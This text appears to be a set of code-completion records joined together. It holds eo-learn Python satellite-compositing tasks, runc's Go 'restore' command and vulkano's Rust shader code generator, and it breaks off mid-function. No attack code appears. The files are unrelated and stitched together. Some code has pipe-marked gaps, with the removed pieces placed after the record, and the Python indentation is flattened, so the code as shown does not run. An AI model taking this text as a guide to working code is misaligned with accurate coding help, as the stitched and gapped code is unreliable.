indices = np.where(np.isnan(data_perc_low), self.max_index, np.nanargmin(abs_diff, axis=0))
return indices
def _geoville_index_by_percentile(self, data, percentile):
""" Calculate percentile of numpy stack and return the index of the chosen pixel. """
# no_obs = bn.allnan(arr_tmp["data"], axis=0)
data_tmp = np.array(data, copy=True)
valid_obs = np.sum(np.isfinite(data_tmp), axis=0)
# replace NaN with maximum
max_val = np.nanmax(data_tmp) + 1
data_tmp[np.isnan(data_tmp)] = max_val
# sort - former NaNs will move to the end
ind_tmp = np.argsort(data_tmp, kind="mergesort", axis=0)
# desired position as well as floor and ceiling of it
k_arr = (valid_obs - 1) * (percentile / 100.0)
k_arr = np.where(k_arr < 0, 0, k_arr)
f_arr = np.floor(k_arr + 0.5)
f_arr = f_arr.astype(int)
# get floor value of reference band and index band
ind = f_arr.astype("int16")
y_val, x_val = ind_tmp.shape[1], ind_tmp.shape[2]
y_val, x_val = np.ogrid[0:y_val, 0:x_val]
idx = np.where(valid_obs == 0, self.max_index, ind_tmp[ind, y_val, x_val])
return idx
def _get_reference_band(self, data):
""" Extract reference band from input 4D data according to compositing method
:param data: 4D array from which to extract reference band (e.g. blue, maxNDVI, ..)
:type data: numpy array
:return: 3D array containing reference band according to compositing method
"""
raise NotImplementedError
def _get_indices(self, data):
""" Compute indices along temporal dimension corresponding to the sought percentile
:param data: Input 3D array holding the reference band
:type data: numpy array
:return: 2D array holding the temporal index corresponding to percentile
"""
indices = self._index_by_percentile(data, self.percentile)
return indices
def execute(self, eopatch):
""" Compute composite array merging temporal frames according to the compositing method
:param eopatch: eopatch holding time-series
:return: eopatch with composite image of time-series
"""
feature_type, feature_name = next(self.feature(eopatch))
data = eopatch[feature_type][feature_name].copy()
# compute band according to compositing method (e.g. blue, maxNDVI, maxNDWI)
reference_bands = self._get_reference_band(data)
# find temporal indices corresponding to pre-defined percentile
indices = self._get_indices(reference_bands)
# compute composite image selecting values along temporal dimension corresponding to percentile indices
composite_image = np.empty((data.shape[1:]), np.float32)
composite_image[:] = self.no_data_value
for scene_id, scene in enumerate(data):
composite_image = np.where(np.dstack([indices]) == scene_id, scene, composite_image)
eopatch[self.composite_type][self.composite_name] = composite_image
return eopatch
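# Illustrative sketch (toy one-pixel stack, not part of eo-learn): how the numpy
# index-by-percentile lookup above behaves with the default 'lower' interpolation;
# the NaN frame is ignored and the frame holding the 25th-percentile value wins.
def _example_index_by_percentile():
    stack = np.array([[[0.3]], [[0.1]], [[np.nan]]])  # time x height x width
    perc = np.nanpercentile(stack, 25, axis=0, interpolation='lower')
    abs_diff = np.where(np.isnan(perc), np.inf, abs(stack - perc))
    return np.where(np.isnan(perc), 255, np.nanargmin(abs_diff, axis=0))  # -> [[1]]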
class BlueCompositing(BaseCompositing):
""" Blue band compositing method
- blue (25th percentile of the blue band)
:param blue_idx: Index of blue band in `feature` array
:type blue_idx: int
"""
def __init__(self, feature, feature_composite, blue_idx, interpolation='lower'):
super().__init__(feature, feature_composite, percentile=25, interpolation=interpolation)
self.blue_idx = blue_idx
if not isinstance(blue_idx, int):
raise ValueError('Incorrect value of blue band index specified')
def _get_reference_band(self, data):
""" Extract the blue band from time-series
:param data: 4D array from which to extract the blue reference band
:type data: numpy array
:return: 3D array containing the blue reference band
"""
return data[..., self.blue_idx].astype("float32")
class HOTCompositing(BaseCompositing):
""" HOT compositing method
- HOT (Index using bands blue and red)
The HOT index is defined as per
Zhu, Z., & Woodcock, C. E. (2012). "Object-based cloud and cloud shadow detection in Landsat imagery."
Remote Sensing of Environment, 118, 83-94.
:param blue_idx: Index of blue band in `feature` array
:type blue_idx: int
:param red_idx: Index of red band in `feature` array
:type red_idx: int
"""
def | (self, feature, feature_composite, blue_idx, red_idx, interpolation='lower'):
super().__init__(feature, feature_composite, percentile=25, interpolation=interpolation)
self.blue_idx = blue_idx
self.red_idx = red_idx
if not isinstance(blue_idx, int) or not isinstance(red_idx, int):
raise ValueError('Incorrect values of blue and red band indices specified')
def _get_reference_band(self, data):
""" Extract the HOT band from time-series
:param data: 4D array from which to extract the HOT reference band
:type data: numpy array
:return: 3D array containing the HOT reference band
"""
return data[..., self.blue_idx] - 0.5 * data[..., self.red_idx] - 0.08
class MaxNDVICompositing(BaseCompositing):
""" maxNDVI compositing method
- maxNDVI (temporal maximum of NDVI)
:param red_idx: Index of red band in `feature` array
:type red_idx: int
:param nir_idx: Index of NIR band in `feature` array
:type nir_idx: int
"""
def __init__(self, feature, feature_composite, red_idx, nir_idx, interpolation='lower'):
super().__init__(feature, feature_composite, percentile=[0, 100], interpolation=interpolation)
self.red_idx = red_idx
self.nir_idx = nir_idx
if not isinstance(nir_idx, int) or not isinstance(red_idx, int):
raise ValueError('Incorrect values of red and NIR band indices specified')
def _get_reference_band(self, data):
""" Extract the NDVI band from time-series
:param data: 4D array from which to compute the NDVI reference band
:type data: numpy array
:return: 3D array containing the NDVI reference band
"""
nir = data[..., self.nir_idx].astype("float32")
red = data[..., self.red_idx].astype("float32")
return (nir - red) / (nir + red)
def _get_indices(self, data):
median = np.nanmedian(data, axis=0)
indices_min = self._index_by_percentile(data, self.percentile[0])
indices_max = self._index_by_percentile(data, self.percentile[1])
indices = np.where(median < -0.05, indices_min, indices_max)
return indices
class MaxNDWICompositing(BaseCompositing):
""" maxNDWI compositing method
- maxNDWI (temporal maximum of NDWI)
:param nir_idx: Index of NIR band in `feature` array
:type nir_idx: int
:param swir1_idx: Index of SWIR1 band in `feature` array
:type swir1_idx: int
"""
def __init__(self, feature, feature_composite, nir_idx, swir1_idx, interpolation='lower'):
super().__init__(feature, feature_composite, percentile=100, interpolation=interpolation)
self.nir_idx = nir_idx
self.swir1_idx = swir1_idx
if not isinstance(nir_idx, int) or not isinstance(swir1_idx, int):
raise ValueError('Incorrect values of NIR and SWIR1 band indices specified')
def _get_reference_band(self, data):
""" Extract the NDWI band from time-series
:param data: 4D array from which to compute the NDWI reference band
:type data: numpy array
:return: 3D array containing the NDWI reference band
"""
nir = data[..., self.nir_idx].astype("float32")
swir1 = data[..., self.swir1_idx].astype("float32")
return (nir - swir1) / (nir + swir1)
class MaxRatioCompositing(BaseCompositing):
""" maxRatio compositing method
- maxRatio (temporal maximum of a ratio using bands blue, NIR and SWIR)
:param blue_idx: Index of blue band in `feature` array
:type blue_idx: int
:param nir_idx: Index of NIR band in `feature` array
:type nir_idx: int
:param swir1_idx: Index of SWIR1 band in `feature` array
:type swir1_idx: int
"""
def __init__(self, feature, feature_composite, blue_idx, nir_idx, swir1_idx, interpolation='lower'):
super().__init__(feature, feature_composite, percentile=100, interpolation=interpolation)
self.blue_idx = blue_idx
self.nir_idx = nir_idx
self.swir1_idx = swir1_idx
if not isinstance(blue_idx, int) or not isinstance(nir_idx, int) or not isinstance(swir1_idx, int):
raise ValueError('Incorrect values for either blue, NIR or SWIR1 band indices specified')
def _get_reference_band(self, data):
""" Extract the max-ratio band from time-series
The max-ratio is defined as max(NIR,SWIR1)/BLUE
:param data: 4D array from which to compute the max-ratio reference band
:type data: numpy array
:return: 3D array containing the max-ratio reference band
"""
blue = data[..., self.blue_idx].astype("float32")
nir = data[..., self.nir_idx].astype("float32")
swir1 = data[..., self.swir1_idx].astype("float32")
return np.nanmax(np.array([nir, swir1]), axis=0) / blue
class HistogramMatching(EOTask):
""" Histogram match of each band of each scene within a time-series with respect to the corresponding band of a
reference composite.
Contributor: Johannes Schmid, GeoVille Information Systems GmbH, 2018
:param feature: Name of the eopatch data layer that will undergo a histogram match.
Should be of the FeatureType "DATA".
:type feature: (FeatureType, str) or (FeatureType, str, str)
:param reference: Name of the eopatch data layer that represents the reference for the histogram match.
Should be of the FeatureType "DATA_TIMELESS".
:type reference: (FeatureType, str)
"""
def __init__(self, feature, reference):
self.feature = self._parse_features(feature, new_names=True,
default_feature_type=FeatureType.DATA,
rename_function='{}_NORMALISED'.format)
self.reference = self._parse_features(reference, default_feature_type=FeatureType.DATA_TIMELESS)
def execute(self, eopatch):
""" Perform histogram matching of the time-series with respect to a reference scene
:param eopatch: eopatch holding the time-series and reference data
:type eopatch: EOPatch
:return: The same eopatch instance with the normalised time-series
"""
feature_type, feature_name, new_feature_name = next(self.feature(eopatch))
reference_type, reference_name = next(self.reference(eopatch))
reference_scene = eopatch[reference_type][reference_name]
# check if band dimension matches
if reference_scene.shape[-1] != eopatch[feature_type][feature_name].shape[-1]:
raise ValueError('Time-series and reference scene must have corresponding bands')
eopatch[feature_type][new_feature_name] = np.zeros_like(eopatch[feature_type][feature_name])
for source_id, source in enumerate(eopatch[feature_type][feature_name]):
# mask-out same invalid pixels
src_masked = np.where(np.isnan(reference_scene), np.nan, source)
ref_masked = np.where(np.isnan(source), np.nan, reference_scene)
# compute statistics
std_ref = np.nanstd(ref_masked, axis=(0, 1), dtype=np.float64)
std_src = np.nanstd(src_masked, axis=(0, 1), dtype=np.float64)
mean_ref = np.nanmean(ref_masked, axis=(0, 1), dtype=np.float64)
mean_src = np.nanmean(src_masked, axis=(0, 1), dtype=np.float64)
# normalise values
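            # the linear transform below is equivalent to
            # (source - mean_src) * (std_ref / std_src) + mean_ref,
            # i.e. each band is shifted and scaled to match the reference mean and std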
eopatch[feature_type][new_feature_name][source_id] = \
source * (std_ref / std_src) + (mean_ref - (mean_src * (std_ref / std_src)))
return eopatch
| __init__ |
restore.go | // +build linux
package main
import (
"os"
"github.com/opencontainers/runc/libcontainer"
"github.com/opencontainers/runc/libcontainer/userns"
"github.com/sirupsen/logrus"
"github.com/urfave/cli"
)
var restoreCommand = cli.Command{
Name: "restore",
Usage: "restore a container from a previous checkpoint",
ArgsUsage: `<container-id>
Where "<container-id>" is the name for the instance of the container to be
restored.`,
Description: `Restores the saved state of the container instance that was previously saved
using the runc checkpoint command.`,
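	// Illustrative invocation (paths and container id assumed):
	//   runc restore --image-path ./checkpoint --bundle ./bundle <container-id>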
Flags: []cli.Flag{
cli.StringFlag{
Name: "console-socket",
Value: "",
Usage: "path to an AF_UNIX socket which will receive a file descriptor referencing the master end of the console's pseudoterminal",
},
cli.StringFlag{
Name: "image-path",
Value: "",
Usage: "path to criu image files for restoring",
},
cli.StringFlag{
Name: "work-path",
Value: "",
Usage: "path for saving work files and logs",
},
cli.BoolFlag{
Name: "tcp-established",
Usage: "allow open tcp connections",
},
cli.BoolFlag{
Name: "ext-unix-sk",
Usage: "allow external unix sockets",
},
cli.BoolFlag{
Name: "shell-job",
Usage: "allow shell jobs",
},
cli.BoolFlag{
Name: "file-locks",
Usage: "handle file locks, for safety",
},
cli.StringFlag{
Name: "manage-cgroups-mode",
Value: "",
Usage: "cgroups mode: 'soft' (default), 'full' and 'strict'",
},
cli.StringFlag{
Name: "bundle, b",
Value: "",
Usage: "path to the root of the bundle directory",
},
cli.BoolFlag{
Name: "detach,d",
Usage: "detach from the container's process",
},
cli.StringFlag{
Name: "pid-file",
Value: "",
Usage: "specify the file to write the process id to",
},
cli.BoolFlag{
Name: "no-subreaper",
Usage: "disable the use of the subreaper used to reap reparented processes",
},
cli.BoolFlag{
Name: "no-pivot",
Usage: "do not use pivot root to jail process inside rootfs. This should be used whenever the rootfs is on top of a ramdisk",
},
cli.StringSliceFlag{
Name: "empty-ns",
Usage: "create a namespace, but don't restore its properties",
},
cli.BoolFlag{
Name: "auto-dedup",
Usage: "enable auto deduplication of memory images",
},
cli.BoolFlag{
Name: "lazy-pages",
Usage: "use userfaultfd to lazily restore memory pages",
},
cli.StringFlag{
Name: "lsm-profile",
Value: "",
Usage: "Specify an LSM profile to be used during restore in the form of TYPE:NAME.",
},
},
Action: func(context *cli.Context) error {
if err := checkArgs(context, 1, exactArgs); err != nil {
return err
}
// XXX: Currently this is untested with rootless containers.
if os.Geteuid() != 0 || userns.RunningInUserNS() {
			logrus.Warn("runc restore is untested with rootless containers")
}
spec, err := setupSpec(context)
if err != nil |
options := criuOptions(context)
if err := setEmptyNsMask(context, options); err != nil {
return err
}
status, err := startContainer(context, spec, CT_ACT_RESTORE, options)
if err != nil {
return err
}
// exit with the container's exit status so any external supervisor is
// notified of the exit with the correct exit status.
os.Exit(status)
return nil
},
}
func criuOptions(context *cli.Context) *libcontainer.CriuOpts {
imagePath, parentPath, err := prepareImagePaths(context)
if err != nil {
fatal(err)
}
return &libcontainer.CriuOpts{
ImagesDirectory: imagePath,
WorkDirectory: context.String("work-path"),
ParentImage: parentPath,
LeaveRunning: context.Bool("leave-running"),
TcpEstablished: context.Bool("tcp-established"),
ExternalUnixConnections: context.Bool("ext-unix-sk"),
ShellJob: context.Bool("shell-job"),
FileLocks: context.Bool("file-locks"),
PreDump: context.Bool("pre-dump"),
AutoDedup: context.Bool("auto-dedup"),
LazyPages: context.Bool("lazy-pages"),
StatusFd: context.Int("status-fd"),
LsmProfile: context.String("lsm-profile"),
}
}
| {
return err
} |
codegen.rs | // Copyright (c) 2016 The vulkano developers
// Licensed under the Apache License, Version 2.0
// <LICENSE-APACHE or
// https://www.apache.org/licenses/LICENSE-2.0> or the MIT
// license <LICENSE-MIT or https://opensource.org/licenses/MIT>,
// at your option. All files in the project carrying such
// notice may not be copied, modified, or distributed except
// according to those terms.
use crate::entry_point;
use crate::read_file_to_string;
use crate::spec_consts;
use crate::structs;
use crate::RegisteredType;
use crate::TypesMeta;
use proc_macro2::{Span, TokenStream};
pub use shaderc::{CompilationArtifact, IncludeType, ResolvedInclude, ShaderKind};
use shaderc::{CompileOptions, Compiler, EnvVersion, SpirvVersion, TargetEnv};
use std::collections::HashMap;
use std::iter::Iterator;
use std::path::Path;
use std::{
cell::{RefCell, RefMut},
io::Error as IoError,
};
use syn::Ident;
use vulkano::{
spirv::{Capability, Instruction, Spirv, SpirvError, StorageClass},
Version,
};
pub(super) fn path_to_str(path: &Path) -> &str {
path.to_str().expect(
"Could not stringify the file to be included. Make sure the path consists of \
valid unicode characters.",
)
}
fn include_callback(
requested_source_path_raw: &str,
directive_type: IncludeType,
contained_within_path_raw: &str,
recursion_depth: usize,
include_directories: &[impl AsRef<Path>],
root_source_has_path: bool,
base_path: &impl AsRef<Path>,
mut includes_tracker: RefMut<Vec<String>>,
) -> Result<ResolvedInclude, String> {
let file_to_include = match directive_type {
IncludeType::Relative => {
let requested_source_path = Path::new(requested_source_path_raw);
            // Is the current shader source embedded within a rust macro?
            // If so, abort unless the requested path is absolute.
if !root_source_has_path && recursion_depth == 1 && !requested_source_path.is_absolute()
{
let requested_source_name = requested_source_path
.file_name()
.expect("Could not get the name of the requested source file.")
.to_string_lossy();
let requested_source_directory = requested_source_path
.parent()
.expect("Could not get the directory of the requested source file.")
.to_string_lossy();
return Err(format!(
"Usage of relative paths in imports in embedded GLSL is not \
allowed, try using `#include <{}>` and adding the directory \
`{}` to the `include` array in your `shader!` macro call \
instead.",
requested_source_name, requested_source_directory
));
}
let mut resolved_path = if recursion_depth == 1 {
Path::new(contained_within_path_raw)
.parent()
.map(|parent| base_path.as_ref().join(parent))
} else {
Path::new(contained_within_path_raw)
.parent()
.map(|parent| parent.to_owned())
}
.unwrap_or_else(|| {
panic!(
"The file `{}` does not reside in a directory. This is \
an implementation error.",
contained_within_path_raw
)
});
resolved_path.push(requested_source_path);
if !resolved_path.is_file() {
return Err(format!(
"Invalid inclusion path `{}`, the path does not point to a file.",
requested_source_path_raw
));
}
resolved_path
}
IncludeType::Standard => {
let requested_source_path = Path::new(requested_source_path_raw);
if requested_source_path.is_absolute() {
// This message is printed either when using a missing file with an absolute path
// in the relative include directive or when using absolute paths in a standard
// include directive.
return Err(format!(
"No such file found, as specified by the absolute path. \
                Keep in mind that absolute paths cannot be used with \
inclusion from standard directories (`#include <...>`), try \
using `#include \"...\"` instead. Requested path: {}",
requested_source_path_raw
));
}
let found_requested_source_path = include_directories
.iter()
.map(|include_directory| include_directory.as_ref().join(requested_source_path))
.find(|resolved_requested_source_path| resolved_requested_source_path.is_file());
if let Some(found_requested_source_path) = found_requested_source_path {
found_requested_source_path
} else {
return Err(format!(
"Could not include the file `{}` from any include directories.",
requested_source_path_raw
));
}
}
};
let file_to_include_string = path_to_str(file_to_include.as_path()).to_string();
let content = read_file_to_string(file_to_include.as_path()).map_err(|_| {
format!(
"Could not read the contents of file `{}` to be included in the \
shader source.",
&file_to_include_string
)
})?;
includes_tracker.push(file_to_include_string.clone());
Ok(ResolvedInclude {
resolved_name: file_to_include_string,
content,
})
}
pub fn compile(
path: Option<String>,
base_path: &impl AsRef<Path>,
code: &str,
ty: ShaderKind,
include_directories: &[impl AsRef<Path>],
macro_defines: &[(impl AsRef<str>, impl AsRef<str>)],
vulkan_version: Option<EnvVersion>,
spirv_version: Option<SpirvVersion>,
) -> Result<(CompilationArtifact, Vec<String>), String> {
let includes_tracker = RefCell::new(Vec::new());
let mut compiler = Compiler::new().ok_or("failed to create GLSL compiler")?;
    let mut compile_options = CompileOptions::new().ok_or("failed to initialize compile options")?;
compile_options.set_target_env(
TargetEnv::Vulkan,
vulkan_version.unwrap_or(EnvVersion::Vulkan1_0) as u32,
);
if let Some(spirv_version) = spirv_version {
compile_options.set_target_spirv(spirv_version);
}
    // For embedded shaders, fall back to an arbitrary placeholder file name
    let root_source_path = path.as_deref().unwrap_or("shader.glsl");
// Specify file resolution callback for the `#include` directive
compile_options.set_include_callback(
|requested_source_path, directive_type, contained_within_path, recursion_depth| {
include_callback(
requested_source_path,
directive_type,
contained_within_path,
recursion_depth,
include_directories,
path.is_some(),
base_path,
includes_tracker.borrow_mut(),
)
},
);
for (macro_name, macro_value) in macro_defines.iter() {
compile_options.add_macro_definition(macro_name.as_ref(), Some(macro_value.as_ref()));
}
let content = compiler
.compile_into_spirv(&code, ty, root_source_path, "main", Some(&compile_options))
.map_err(|e| e.to_string())?;
let includes = includes_tracker.borrow().clone();
Ok((content, includes))
}
pub(super) fn reflect<'a, I>(
prefix: &'a str,
words: &[u32],
types_meta: &TypesMeta,
input_paths: I,
exact_entrypoint_interface: bool,
shared_constants: bool,
types_registry: &'a mut HashMap<String, RegisteredType>,
) -> Result<(TokenStream, TokenStream), Error>
where
I: IntoIterator<Item = &'a str>,
{
let struct_name = Ident::new(&format!("{}Shader", prefix), Span::call_site());
let spirv = Spirv::new(words)?;
// checking whether each required capability is enabled in the Vulkan device
let mut cap_checks: Vec<TokenStream> = vec![];
match spirv.version() {
Version::V1_0 => {}
Version::V1_1 | Version::V1_2 | Version::V1_3 => {
cap_checks.push(quote! {
if device.api_version() < Version::V1_1 {
panic!("Device API version 1.1 required");
}
});
}
Version::V1_4 => {
cap_checks.push(quote! {
if device.api_version() < Version::V1_2
&& !device.enabled_extensions().khr_spirv_1_4 {
panic!("Device API version 1.2 or extension VK_KHR_spirv_1_4 required");
}
});
}
Version::V1_5 => {
cap_checks.push(quote! {
if device.api_version() < Version::V1_2 {
panic!("Device API version 1.2 required");
}
});
}
_ => return Err(Error::UnsupportedSpirvVersion),
}
for i in spirv.instructions() {
let dev_req = {
match i {
Instruction::Variable {
result_type_id: _,
result_id: _,
storage_class,
initializer: _,
} => storage_class_requirement(storage_class),
Instruction::TypePointer {
result_id: _,
storage_class,
ty: _,
} => storage_class_requirement(storage_class),
Instruction::Capability { capability } => capability_requirement(capability),
_ => &[],
}
};
        if dev_req.is_empty() {
continue;
}
let (conditions, messages): (Vec<_>, Vec<_>) = dev_req
.iter()
.map(|req| match req {
DeviceRequirement::Extension(extension) => {
let ident = Ident::new(extension, Span::call_site());
(
quote! { device.enabled_extensions().#ident },
format!("extension {}", extension),
)
}
DeviceRequirement::Feature(feature) => {
let ident = Ident::new(feature, Span::call_site());
(
quote! { device.enabled_features().#ident },
format!("feature {}", feature),
)
}
DeviceRequirement::Version(major, minor) => {
let ident = format_ident!("V{}_{}", major, minor);
(
quote! { device.api_version() >= crate::Version::#ident },
format!("API version {}.{}", major, minor),
)
}
})
.unzip();
let messages = messages.join(", ");
cap_checks.push(quote! {
if !std::array::IntoIter::new([#(#conditions),*]).all(|x| x) {
panic!("One of the following must be enabled on the device: {}", #messages);
}
});
}
// writing one method for each entry point of this module
let mut entry_points_inside_impl: Vec<TokenStream> = vec![];
for instruction in spirv
.iter_entry_point()
.filter(|instruction| matches!(instruction, Instruction::EntryPoint { .. }))
{
let entry_point = entry_point::write_entry_point(
prefix,
&spirv,
instruction,
types_meta,
exact_entrypoint_interface,
shared_constants,
);
entry_points_inside_impl.push(entry_point);
}
let include_bytes = input_paths.into_iter().map(|s| {
quote! {
// using include_bytes here ensures that changing the shader will force recompilation.
// The bytes themselves can be optimized out by the compiler as they are unused.
::std::include_bytes!( #s )
}
});
let structs = structs::write_structs(prefix, &spirv, types_meta, types_registry);
let specialization_constants = spec_consts::write_specialization_constants(
prefix,
&spirv,
types_meta,
shared_constants,
types_registry,
);
let shader_code = quote! {
pub struct #struct_name {
shader: ::std::sync::Arc<::vulkano::pipeline::shader::ShaderModule>,
}
impl #struct_name {
/// Loads the shader in Vulkan as a `ShaderModule`.
#[inline]
#[allow(unsafe_code)]
pub fn load(device: ::std::sync::Arc<::vulkano::device::Device>)
-> Result<#struct_name, ::vulkano::OomError>
{
let _bytes = ( #( #include_bytes),* );
#( #cap_checks )*
static WORDS: &[u32] = &[ #( #words ),* ];
unsafe {
Ok(#struct_name {
shader: ::vulkano::pipeline::shader::ShaderModule::from_words(device, WORDS)?
})
}
}
/// Returns the module that was created.
#[allow(dead_code)]
#[inline]
pub fn module(&self) -> &::std::sync::Arc<::vulkano::pipeline::shader::ShaderModule> {
&self.shader
}
#( #entry_points_inside_impl )*
}
#specialization_constants
};
Ok((shader_code, structs))
}
#[derive(Debug)]
pub enum Error {
UnsupportedSpirvVersion,
IoError(IoError),
SpirvError(SpirvError),
}
impl From<IoError> for Error {
#[inline]
fn from(err: IoError) -> Error {
Error::IoError(err)
}
}
impl From<SpirvError> for Error {
#[inline]
fn from(err: SpirvError) -> Error {
Error::SpirvError(err)
}
}
/// Returns the Vulkan device requirement for a SPIR-V `OpCapability`.
#[rustfmt::skip]
fn capability_requirement(cap: &Capability) -> &'static [DeviceRequirement] {
match *cap {
Capability::Matrix => &[],
Capability::Shader => &[],
Capability::InputAttachment => &[],
Capability::Sampled1D => &[],
Capability::Image1D => &[],
Capability::SampledBuffer => &[],
Capability::ImageBuffer => &[],
Capability::ImageQuery => &[],
Capability::DerivativeControl => &[],
Capability::Geometry => &[DeviceRequirement::Feature("geometry_shader")],
Capability::Tessellation => &[DeviceRequirement::Feature("tessellation_shader")],
Capability::Float64 => &[DeviceRequirement::Feature("shader_float64")],
Capability::Int64 => &[DeviceRequirement::Feature("shader_int64")],
Capability::Int64Atomics => &[
DeviceRequirement::Feature("shader_buffer_int64_atomics"),
DeviceRequirement::Feature("shader_shared_int64_atomics"),
DeviceRequirement::Feature("shader_image_int64_atomics"),
],
/* Capability::AtomicFloat16AddEXT => &[
DeviceRequirement::Feature("shader_buffer_float16_atomic_add"),
DeviceRequirement::Feature("shader_shared_float16_atomic_add"),
], */
Capability::AtomicFloat32AddEXT => &[
DeviceRequirement::Feature("shader_buffer_float32_atomic_add"),
DeviceRequirement::Feature("shader_shared_float32_atomic_add"),
DeviceRequirement::Feature("shader_image_float32_atomic_add"),
],
Capability::AtomicFloat64AddEXT => &[
DeviceRequirement::Feature("shader_buffer_float64_atomic_add"),
DeviceRequirement::Feature("shader_shared_float64_atomic_add"),
],
/* Capability::AtomicFloat16MinMaxEXT => &[
DeviceRequirement::Feature("shader_buffer_float16_atomic_min_max"),
DeviceRequirement::Feature("shader_shared_float16_atomic_min_max"),
], */
/* Capability::AtomicFloat32MinMaxEXT => &[
DeviceRequirement::Feature("shader_buffer_float32_atomic_min_max"),
DeviceRequirement::Feature("shader_shared_float32_atomic_min_max"),
DeviceRequirement::Feature("shader_image_float32_atomic_min_max"),
], */
/* Capability::AtomicFloat64MinMaxEXT => &[
DeviceRequirement::Feature("shader_buffer_float64_atomic_min_max"),
DeviceRequirement::Feature("shader_shared_float64_atomic_min_max"),
], */
Capability::Int64ImageEXT => &[DeviceRequirement::Feature("shader_image_int64_atomics")],
Capability::Int16 => &[DeviceRequirement::Feature("shader_int16")],
Capability::TessellationPointSize => &[DeviceRequirement::Feature(
"shader_tessellation_and_geometry_point_size",
)],
Capability::GeometryPointSize => &[DeviceRequirement::Feature(
"shader_tessellation_and_geometry_point_size",
)],
Capability::ImageGatherExtended => {
&[DeviceRequirement::Feature("shader_image_gather_extended")]
}
Capability::StorageImageMultisample => &[DeviceRequirement::Feature(
"shader_storage_image_multisample",
)],
Capability::UniformBufferArrayDynamicIndexing => &[DeviceRequirement::Feature(
"shader_uniform_buffer_array_dynamic_indexing",
)],
Capability::SampledImageArrayDynamicIndexing => &[DeviceRequirement::Feature(
"shader_sampled_image_array_dynamic_indexing",
)],
Capability::StorageBufferArrayDynamicIndexing => &[DeviceRequirement::Feature(
"shader_storage_buffer_array_dynamic_indexing",
)],
Capability::StorageImageArrayDynamicIndexing => &[DeviceRequirement::Feature(
"shader_storage_image_array_dynamic_indexing",
)],
Capability::ClipDistance => &[DeviceRequirement::Feature("shader_clip_distance")],
Capability::CullDistance => &[DeviceRequirement::Feature("shader_cull_distance")],
Capability::ImageCubeArray => &[DeviceRequirement::Feature("image_cube_array")],
Capability::SampleRateShading => &[DeviceRequirement::Feature("sample_rate_shading")],
Capability::SparseResidency => &[DeviceRequirement::Feature("shader_resource_residency")],
Capability::MinLod => &[DeviceRequirement::Feature("shader_resource_min_lod")],
Capability::SampledCubeArray => &[DeviceRequirement::Feature("image_cube_array")],
Capability::ImageMSArray => &[DeviceRequirement::Feature(
"shader_storage_image_multisample",
)],
Capability::StorageImageExtendedFormats => &[],
Capability::InterpolationFunction => &[DeviceRequirement::Feature("sample_rate_shading")],
Capability::StorageImageReadWithoutFormat => &[DeviceRequirement::Feature(
"shader_storage_image_read_without_format",
)],
Capability::StorageImageWriteWithoutFormat => &[DeviceRequirement::Feature(
"shader_storage_image_write_without_format",
)],
Capability::MultiViewport => &[DeviceRequirement::Feature("multi_viewport")],
Capability::DrawParameters => &[
DeviceRequirement::Feature("shader_draw_parameters"),
DeviceRequirement::Extension("khr_shader_draw_parameters"),
],
Capability::MultiView => &[DeviceRequirement::Feature("multiview")],
Capability::DeviceGroup => &[
DeviceRequirement::Version(1, 1),
DeviceRequirement::Extension("khr_device_group"),
],
Capability::VariablePointersStorageBuffer => &[DeviceRequirement::Feature(
"variable_pointers_storage_buffer",
)],
Capability::VariablePointers => &[DeviceRequirement::Feature("variable_pointers")],
Capability::ShaderClockKHR => &[DeviceRequirement::Extension("khr_shader_clock")],
Capability::StencilExportEXT => {
&[DeviceRequirement::Extension("ext_shader_stencil_export")]
}
Capability::SubgroupBallotKHR => {
&[DeviceRequirement::Extension("ext_shader_subgroup_ballot")]
}
Capability::SubgroupVoteKHR => &[DeviceRequirement::Extension("ext_shader_subgroup_vote")],
Capability::ImageReadWriteLodAMD => &[DeviceRequirement::Extension(
"amd_shader_image_load_store_lod",
)],
Capability::ImageGatherBiasLodAMD => {
&[DeviceRequirement::Extension("amd_texture_gather_bias_lod")]
}
Capability::FragmentMaskAMD => &[DeviceRequirement::Extension("amd_shader_fragment_mask")],
Capability::SampleMaskOverrideCoverageNV => &[DeviceRequirement::Extension(
"nv_sample_mask_override_coverage",
)],
Capability::GeometryShaderPassthroughNV => &[DeviceRequirement::Extension(
"nv_geometry_shader_passthrough",
)],
Capability::ShaderViewportIndex => {
&[DeviceRequirement::Feature("shader_output_viewport_index")]
}
Capability::ShaderLayer => &[DeviceRequirement::Feature("shader_output_layer")],
Capability::ShaderViewportIndexLayerEXT => &[
DeviceRequirement::Extension("ext_shader_viewport_index_layer"),
DeviceRequirement::Extension("nv_viewport_array2"),
],
Capability::ShaderViewportMaskNV => &[DeviceRequirement::Extension("nv_viewport_array2")],
Capability::PerViewAttributesNV => &[DeviceRequirement::Extension(
"nvx_multiview_per_view_attributes",
)],
Capability::StorageBuffer16BitAccess => {
&[DeviceRequirement::Feature("storage_buffer16_bit_access")]
}
Capability::UniformAndStorageBuffer16BitAccess => &[DeviceRequirement::Feature(
"uniform_and_storage_buffer16_bit_access",
)],
Capability::StoragePushConstant16 => {
&[DeviceRequirement::Feature("storage_push_constant16")]
}
Capability::StorageInputOutput16 => &[DeviceRequirement::Feature("storage_input_output16")],
Capability::GroupNonUniform => todo!(),
Capability::GroupNonUniformVote => todo!(),
Capability::GroupNonUniformArithmetic => todo!(),
Capability::GroupNonUniformBallot => todo!(),
Capability::GroupNonUniformShuffle => todo!(),
Capability::GroupNonUniformShuffleRelative => todo!(),
Capability::GroupNonUniformClustered => todo!(),
Capability::GroupNonUniformQuad => todo!(),
Capability::GroupNonUniformPartitionedNV => todo!(),
Capability::SampleMaskPostDepthCoverage => {
&[DeviceRequirement::Extension("ext_post_depth_coverage")]
}
Capability::ShaderNonUniform => &[
DeviceRequirement::Version(1, 2),
DeviceRequirement::Extension("ext_descriptor_indexing"),
],
Capability::RuntimeDescriptorArray => {
&[DeviceRequirement::Feature("runtime_descriptor_array")]
}
Capability::InputAttachmentArrayDynamicIndexing => &[DeviceRequirement::Feature(
"shader_input_attachment_array_dynamic_indexing",
)],
Capability::UniformTexelBufferArrayDynamicIndexing => &[DeviceRequirement::Feature(
"shader_uniform_texel_buffer_array_dynamic_indexing",
)],
Capability::StorageTexelBufferArrayDynamicIndexing => &[DeviceRequirement::Feature(
"shader_storage_texel_buffer_array_dynamic_indexing",
)],
Capability::UniformBufferArrayNonUniformIndexing => &[DeviceRequirement::Feature(
"shader_uniform_buffer_array_non_uniform_indexing",
)],
Capability::SampledImageArrayNonUniformIndexing => &[DeviceRequirement::Feature(
"shader_sampled_image_array_non_uniform_indexing",
)],
Capability::StorageBufferArrayNonUniformIndexing => &[DeviceRequirement::Feature(
